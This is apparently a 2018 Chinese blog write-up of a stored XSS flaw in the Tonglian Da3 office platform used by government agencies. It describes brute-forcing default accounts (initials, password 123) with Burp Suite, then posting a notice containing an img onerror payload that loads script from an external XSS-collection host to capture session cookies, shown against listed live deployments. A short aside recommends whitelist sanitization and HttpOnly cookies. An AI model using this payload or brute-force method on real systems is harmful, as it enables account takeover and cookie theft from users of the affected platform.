admin 发表于 2018-10-20 20:14:15

同联Da3协同办公平台后台通用储存型xss漏洞

<div class="Section1" style="layout-grid:15.6pt;">
        <p class="MsoNormal" align="center" style="text-align:center;">
                同联Da3协同办公平台后台通用储存型xss漏洞
        </p>
        <p class="MsoNormal">
                平台简介:
        </p>
        <p class="MsoNormal">
                <o:p>&nbsp;</o:p>
        </p>
        <p class="MsoNormal" align="left" style="text-align:left;mso-pagination:widow-orphan;">
                北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 <br />
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 <br />
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
        </p>
        <p class="MsoNormal">
                <o:p>&nbsp;</o:p>
        </p>
        <p class="MsoNormal">
                由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
        </p>
        <p class="MsoNormal">
                <o:p>&nbsp;</o:p>
        </p>
        <p class="MsoNormal">
                http://1.1.1.1:7197/cap-aco/#(案例2-)
        </p>
        <p class="MsoNormal">
                <a href="http://www.itonglian.com">http://www.XXOO.com</a> (案例1-官网网站)
        </p>
        <p class="MsoNormal">
                漏洞详情:
        </p>
        <p class="MsoNormal">
                &nbsp;案例一、
        </p>
        <p class="MsoNormal">
                初步确定平台的默认账号为姓名首字母的小写,初始密码为123。为了能够更好地模拟入侵,使用黑盒测试手段进行测试。
        </p>
        <p class="MsoNormal">
                &nbsp;&nbsp;&nbsp;&nbsp; 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
        </p>
        <p class="MsoNormal">
                <o:p>&nbsp;</o:p>
        </p>
        <p class="MsoNormal" align="left" style="text-align:left;mso-pagination:widow-orphan;">
                <!--><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter" />
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0" />
<v:f eqn="sum @0 1 0" />
<v:f eqn="sum 0 0 @1" />
<v:f eqn="prod @2 1 2" />
<v:f eqn="prod @3 21600 pixelWidth" />
<v:f eqn="prod @3 21600 pixelHeight" />
<v:f eqn="sum @0 0 1" />
<v:f eqn="prod @6 1 2" />
<v:f eqn="prod @7 21600 pixelWidth" />
<v:f eqn="sum @8 21600 0" />
<v:f eqn="prod @7 21600 pixelHeight" />
<v:f eqn="sum @10 21600 0" />
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect" />
<o:lock v:ext="edit" aspectratio="t" />
</v:shapetype><v:shape id="_x0000_i1032" type="#_x0000_t75" alt="IMG_256" style="width:469.5pt;height:267pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image001.png" o:title="IMG_256" />
</v:shape><!--><!----><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image002.jpg" target="_blank" class="highslide"><img border="0" width="626" height="356" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image002.jpg" alt="IMG_256" v:shapes="_x0000_i1032" /><!----></a>
        </p>
        <p class="MsoNormal">
                status为302即表示破解成功,然后找一个破解成功的账号登录系统。在通知公告—通知公告发布—拟稿处存在储存型xss漏洞:我在编辑器里填写好标题、选择人员,然后点html,如图:
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image002.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image002.jpg" target="_blank" class="highslide"><!--><v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:414.75pt;height:296.25pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image003.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" target="_blank" class="highslide"><img border="0" width="553" height="395" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" v:shapes="_x0000_i1031" /><!----></a>
        </p>
        <p class="MsoNormal">
                然后插入我们的xss跨站代码。经过测试发现过滤了好多标签(比如script),但没有过滤img、iframe标签;这类按标签名做的黑名单过滤并不可靠,因为被放行标签上的事件属性(如onerror)仍然可以执行脚本,修复时应改用基于白名单的HTML净化并在输出时进行编码。这里我们用img标签来测试,payload如下:
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" target="_blank" class="highslide">&lt;img src=x
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';&gt;,如图:</a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" target="_blank" class="highslide"><!--><v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:414.75pt;height:183pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image005.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><img border="0" width="553" height="244" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" v:shapes="_x0000_i1030" /><!----></a>
        </p>
        <p class="MsoNormal">
                然后发送,接收到的cookie如图(cookie能被脚本读取,说明会话cookie很可能没有设置HttpOnly属性):
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_3" o:spid="_x0000_i1029" type="#_x0000_t75" style="width:415.5pt;height:278.25pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image007.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image008.jpg" target="_blank" class="highslide"><img border="0" width="554" height="371" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image008.jpg" v:shapes="图片_x0020_3" /><!----></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image008.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_1" o:spid="_x0000_i1028" type="#_x0000_t75" style="width:315pt;height:193.5pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image009.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" target="_blank" class="highslide"><img border="0" width="420" height="258" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" v:shapes="图片_x0020_1" /><!----></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                案例二、
        </p>
        <p class="MsoNormal">
                前面的步骤都一样,下面看效果图:
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_5" o:spid="_x0000_i1027" type="#_x0000_t75" style="width:377.25pt;height:210.75pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image011.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image012.jpg" target="_blank" class="highslide"><img border="0" width="503" height="281" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image012.jpg" v:shapes="图片_x0020_5" /><!----></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image012.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_6" o:spid="_x0000_i1026" type="#_x0000_t75" style="width:399pt;height:223.5pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image013.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" target="_blank" class="highslide"><img border="0" width="532" height="298" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" v:shapes="图片_x0020_6" /><!----></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_2" o:spid="_x0000_i1025" type="#_x0000_t75" style="width:308.25pt;height:166.5pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image015.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><img border="0" width="411" height="222" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" v:shapes="图片_x0020_2" /><!----><a name="_GoBack"></a></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
        <p class="MsoNormal">
                <a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><o:p>&nbsp;</o:p></a>
        </p>
</div>